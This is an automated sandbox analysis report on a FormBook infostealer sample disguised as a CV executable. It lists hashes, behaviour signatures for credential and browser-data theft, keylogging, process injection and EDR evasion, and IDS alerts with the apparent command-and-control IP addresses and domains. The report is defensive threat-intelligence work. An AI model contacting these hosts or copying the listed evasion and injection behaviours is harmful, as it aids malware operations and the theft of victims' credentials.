Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CV Lic H&S Olivetti Renzo.exe

Overview

General Information

Sample name:CV Lic H&S Olivetti Renzo.exe
Analysis ID:1561733
MD5:dffcfc55dbe3596498888c48f569adcd
SHA1:0a75b7cdb8ded9722a7f2188777793c6c62a178b
SHA256:1dae087c41578f5a3a6ed11bbe54efa045598e2bdccf54db0315bbbe36fc1956
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • CV Lic H&S Olivetti Renzo.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: DFFCFC55DBE3596498888C48F569ADCD)
    • svchost.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DIRZUznVUfWlad.exe (PID: 5728 cmdline: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winver.exe (PID: 7884 cmdline: "C:\Windows\SysWOW64\winver.exe" MD5: B5471B0FB5402FC318C82C994C6BF84D)
          • DIRZUznVUfWlad.exe (PID: 4544 cmdline: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8032 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" , CommandLine: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe, NewProcessName: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe, OriginalFileName: C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe, ParentCommandLine: "C:\Windows\SysWOW64\winver.exe", ParentImage: C:\Windows\SysWOW64\winver.exe, ParentProcessId: 7884, ParentProcessName: winver.exe, ProcessCommandLine: "C:\Program Files (x86)\BHtluLzPFWyPjqpXXmcmRqLPfYdfxesDYRPduYuQsu\DIRZUznVUfWlad.exe" , ProcessId: 4544, ProcessName: DIRZUznVUfWlad.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 7492, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 7520, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", CommandLine|base64offset|contains: .', Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ParentImage: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe, ParentProcessId: 7492, ParentProcessName: CV Lic H&S Olivetti Renzo.exe, ProcessCommandLine: "C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe", ProcessId: 7520, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:09:50.755454+010028554651A Network Trojan was detected192.168.2.44973676.223.74.7480TCP
                2024-11-24T08:10:16.659859+010028554651A Network Trojan was detected192.168.2.449777154.90.58.20980TCP
                2024-11-24T08:10:32.893304+010028554651A Network Trojan was detected192.168.2.44981747.76.213.19780TCP
                2024-11-24T08:10:48.201147+010028554651A Network Trojan was detected192.168.2.44985474.48.143.8280TCP
                2024-11-24T08:11:03.029501+010028554651A Network Trojan was detected192.168.2.44989313.248.169.4880TCP
                2024-11-24T08:11:18.959244+010028554651A Network Trojan was detected192.168.2.449931103.21.221.8780TCP
                2024-11-24T08:11:36.004913+010028554651A Network Trojan was detected192.168.2.4499728.210.46.2180TCP
                2024-11-24T08:11:50.893888+010028554651A Network Trojan was detected192.168.2.450010203.161.43.22880TCP
                2024-11-24T08:12:05.646132+010028554651A Network Trojan was detected192.168.2.45003413.248.169.4880TCP
                2024-11-24T08:12:20.825674+010028554651A Network Trojan was detected192.168.2.450038147.255.21.18780TCP
                2024-11-24T08:12:35.945886+010028554651A Network Trojan was detected192.168.2.450042104.21.42.7780TCP
                2024-11-24T08:12:51.493441+010028554651A Network Trojan was detected192.168.2.450046172.67.168.22880TCP
                2024-11-24T08:13:06.696046+010028554651A Network Trojan was detected192.168.2.450050194.58.112.17480TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:10:08.556004+010028554641A Network Trojan was detected192.168.2.449759154.90.58.20980TCP
                2024-11-24T08:10:11.211663+010028554641A Network Trojan was detected192.168.2.449765154.90.58.20980TCP
                2024-11-24T08:10:13.907738+010028554641A Network Trojan was detected192.168.2.449771154.90.58.20980TCP
                2024-11-24T08:10:24.789764+010028554641A Network Trojan was detected192.168.2.44979847.76.213.19780TCP
                2024-11-24T08:10:27.446047+010028554641A Network Trojan was detected192.168.2.44980447.76.213.19780TCP
                2024-11-24T08:10:30.164858+010028554641A Network Trojan was detected192.168.2.44981047.76.213.19780TCP
                2024-11-24T08:10:40.198686+010028554641A Network Trojan was detected192.168.2.44983574.48.143.8280TCP
                2024-11-24T08:10:42.917056+010028554641A Network Trojan was detected192.168.2.44984274.48.143.8280TCP
                2024-11-24T08:10:45.583944+010028554641A Network Trojan was detected192.168.2.44984874.48.143.8280TCP
                2024-11-24T08:10:55.017097+010028554641A Network Trojan was detected192.168.2.44987013.248.169.4880TCP
                2024-11-24T08:10:57.596692+010028554641A Network Trojan was detected192.168.2.44988013.248.169.4880TCP
                2024-11-24T08:11:00.312704+010028554641A Network Trojan was detected192.168.2.44988613.248.169.4880TCP
                2024-11-24T08:11:10.868021+010028554641A Network Trojan was detected192.168.2.449909103.21.221.8780TCP
                2024-11-24T08:11:13.540115+010028554641A Network Trojan was detected192.168.2.449917103.21.221.8780TCP
                2024-11-24T08:11:16.211740+010028554641A Network Trojan was detected192.168.2.449924103.21.221.8780TCP
                2024-11-24T08:11:27.930490+010028554641A Network Trojan was detected192.168.2.4499528.210.46.2180TCP
                2024-11-24T08:11:30.602583+010028554641A Network Trojan was detected192.168.2.4499588.210.46.2180TCP
                2024-11-24T08:11:33.274209+010028554641A Network Trojan was detected192.168.2.4499658.210.46.2180TCP
                2024-11-24T08:11:42.908358+010028554641A Network Trojan was detected192.168.2.449991203.161.43.22880TCP
                2024-11-24T08:11:45.590373+010028554641A Network Trojan was detected192.168.2.449997203.161.43.22880TCP
                2024-11-24T08:11:48.403824+010028554641A Network Trojan was detected192.168.2.450004203.161.43.22880TCP
                2024-11-24T08:11:57.671231+010028554641A Network Trojan was detected192.168.2.45002613.248.169.4880TCP
                2024-11-24T08:12:00.297566+010028554641A Network Trojan was detected192.168.2.45003213.248.169.4880TCP
                2024-11-24T08:12:03.062130+010028554641A Network Trojan was detected192.168.2.45003313.248.169.4880TCP
                2024-11-24T08:12:12.741219+010028554641A Network Trojan was detected192.168.2.450035147.255.21.18780TCP
                2024-11-24T08:12:15.407420+010028554641A Network Trojan was detected192.168.2.450036147.255.21.18780TCP
                2024-11-24T08:12:18.190723+010028554641A Network Trojan was detected192.168.2.450037147.255.21.18780TCP
                2024-11-24T08:12:27.641372+010028554641A Network Trojan was detected192.168.2.450039104.21.42.7780TCP
                2024-11-24T08:12:30.335831+010028554641A Network Trojan was detected192.168.2.450040104.21.42.7780TCP
                2024-11-24T08:12:33.076962+010028554641A Network Trojan was detected192.168.2.450041104.21.42.7780TCP
                2024-11-24T08:12:43.368138+010028554641A Network Trojan was detected192.168.2.450043172.67.168.22880TCP
                2024-11-24T08:12:46.040089+010028554641A Network Trojan was detected192.168.2.450044172.67.168.22880TCP
                2024-11-24T08:12:48.715939+010028554641A Network Trojan was detected192.168.2.450045172.67.168.22880TCP
                2024-11-24T08:12:58.667448+010028554641A Network Trojan was detected192.168.2.450047194.58.112.17480TCP
                2024-11-24T08:13:01.334384+010028554641A Network Trojan was detected192.168.2.450048194.58.112.17480TCP
                2024-11-24T08:13:03.997525+010028554641A Network Trojan was detected192.168.2.450049194.58.112.17480TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: CV Lic H&S Olivetti Renzo.exeReversingLabs: Detection: 71%
                Source: CV Lic H&S Olivetti Renzo.exeVirustotal: Detection: 73%Perma Link
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.4145192791.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031660118.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4145128691.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2036469634.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2031290785.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4145164327.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4143976665.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: CV Lic H&S Olivetti Renzo.exeJoe Sandbox ML: detected
                Source: CV Lic H&S Olivetti Renzo.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winver.pdb source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DIRZUznVUfWlad.exe, 00000005.00000000.1954793647.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp, DIRZUznVUfWlad.exe, 00000007.00000002.4144891699.0000000000E6E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700519425.0000000004110000.00000004.00001000.00020000.00000000.sdmp, CV Lic H&S Olivetti Renzo.exe, 00000000.00000003.1700185346.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2032630378.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1938129987.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2032630378.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1939807476.0000000003800000.00000004.00000020.00020000.00000000.sdmp, winver.exe, winver.exe, 00000006.00000003.2031398698.0000000004C4E000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.0000000004FB0000.00000040.00001000.00020000.00000000.sdmp, winver.exe, 00000006.00000003.2038921468.0000000004DFC000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000006.00000002.4145509825.000000000514E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winver.pdbGCTL source: svchost.exe, 00000001.00000003.1999929496.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2000000788.000000000343B000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000002.4144464628.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, DIRZUznVUfWlad.exe, 00000005.00000003.1987572224.0000000000A9B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_003C6CA9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003C60DD
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003C63F9
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003CEB60
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF56F FindFirstFileW,FindClose,0_2_003CF56F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003CF5FA
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1B2F
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003D1C8A
                Source: C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exeCode function: 0_2_003D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003D1F94
                Source: C:\Windows\SysWOW64\winver.exeCode function: 6_2_0301C740 FindFirstFileW,FindNextFileW,FindClose,6_2_0301C740
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then xor eax, eax6_2_03009E10
                Source: C:\Windows\SysWOW64\winver.exeCode function: 4x nop then mov ebx, 00000004h6_2_04DE04E8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49765 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49798 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 76.223.74.74:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49842 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49835 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49909 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49759 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49817 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49848 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49854 -> 74.48.143.82:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49771 -> 154.90.58.209:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49886 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49917 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49924 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49958 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49931 -> 103.21.221.87:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49870 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49952 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49972 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50010 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49893 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50042 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50050 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50047 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49997 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 104.21.42.77:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49804 -> 47.76.213.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49991 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50046 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49965 -> 8.210.46.21:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 172.67.168.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50004 -> 203.161.43.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49880 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 13.248.169.48:80
                Source: DNS query: www.fortevision.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.rtpterbaruwaktu3.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 203.161.43.228 203.161.43.228
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
